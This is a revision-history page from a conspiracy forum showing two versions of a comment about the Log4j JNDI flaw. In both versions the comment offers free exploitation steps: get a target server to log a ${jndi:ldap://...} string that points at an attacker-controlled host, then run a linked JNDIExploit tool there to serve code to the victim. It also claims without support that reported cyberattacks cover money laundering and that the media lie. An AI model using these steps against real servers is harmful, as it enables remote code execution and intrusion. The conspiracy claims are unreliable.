Revisions | Conspiracies - Conspiracy Theories & Facts

Conspiracies

Communities Topics

DEFAULT COMMUNITIES • All General AskWin Funny Technology Animals Sports Gaming DIY Health Positive Privacy

Reason: None provided.

There is nothing new in that vulnerability. May be it was 0-day in distant past, but definitely not now.

And here is how to exploit it, for free:

Do something with target server to make it write to log any string with ${jndi:ldap://hackerownserver.com/resource}. It depends on application running on it, so just select the apropriate way to do it for choosen application
Run this https://github.com/feihong-cs/JNDIExploit on your hackerownserver.com.

How JNDI injection works - https://www.veracode.com/blog/research/exploiting-jndi-injections-java

The core of that hack is a few year (or may be even decade) old hole in all that EnTeRpRi$E java crap. As real EnTeRpRi$Es, no one really do something with it, as usual they make meeting, teambuildings, wrote reports and allocate funds, with millions of presentations and bullshit talk.

They just dig out this old thing to cover all that money laundering and privatisation of company money "cyberattacks" scheme that become very popular in last year.

MSM lies. Even if they are "IT" MSM's. The reality always differ from what they tell you.

2 years ago

1 score

Reason: Original

There is nothing new in that vulnerability. May be it was 0-day in distant past, but definitely not now.

And here is how to exploit it, for free:

Do something with target server to make it write to log any string with ${jndi:ldap://hackerownserver.com/resource}. It depends on application running on it, so just select the apropriate way to do it for choosen application
Run this https://github.com/feihong-cs/JNDIExploit on your hackerownserver.com.

How JNDI injection works - https://www.veracode.com/blog/research/exploiting-jndi-injections-java

This core of that hack is a few year (or may be even decade) old hole in all that EnTeRpRi$E java crap. As real EnTeRpRi$Es, no one really do something with it, as usual they make meeting, teambuildings, wrote reports and allocate funds, with millions of presentations and bullshit talk.

They just dig out this old thing to cover all that money laundering and privatisation of company money "cyberattacks" scheme that become very popular in last year.

2 years ago

1 score

GIFs

Conspiracies Wiki & Links

Conspiracies Book List

External Digital Book Libraries

Mod Logs

Honor Roll

Conspiracies.win: This is a forum for free thinking and for discussing issues which have captured your imagination. Please respect other views and opinions, and keep an open mind. Our goal is to create a fairer and more transparent world for a better future.

Community Rules: <click this link for a detailed explanation of the rules

Rule 1: Be respectful. Attack the argument, not the person.

Rule 2: Don't abuse the report function.

To prevent SPAM, posts from accounts younger than 4 days old, and/or with <100 points, wont appear in the feed until approved by a mod.

Disclaimer: Submissions/comments of exceptionally low quality, trolling, stalking, spam, and those submissions/comments determined to be intentionally misleading, calls to violence and/or abuse of other users here, may all be removed at moderator's discretion.

Moderators

Message the Moderators

Terms of Service | Privacy Policy

2024.12.01 - t96xg (status)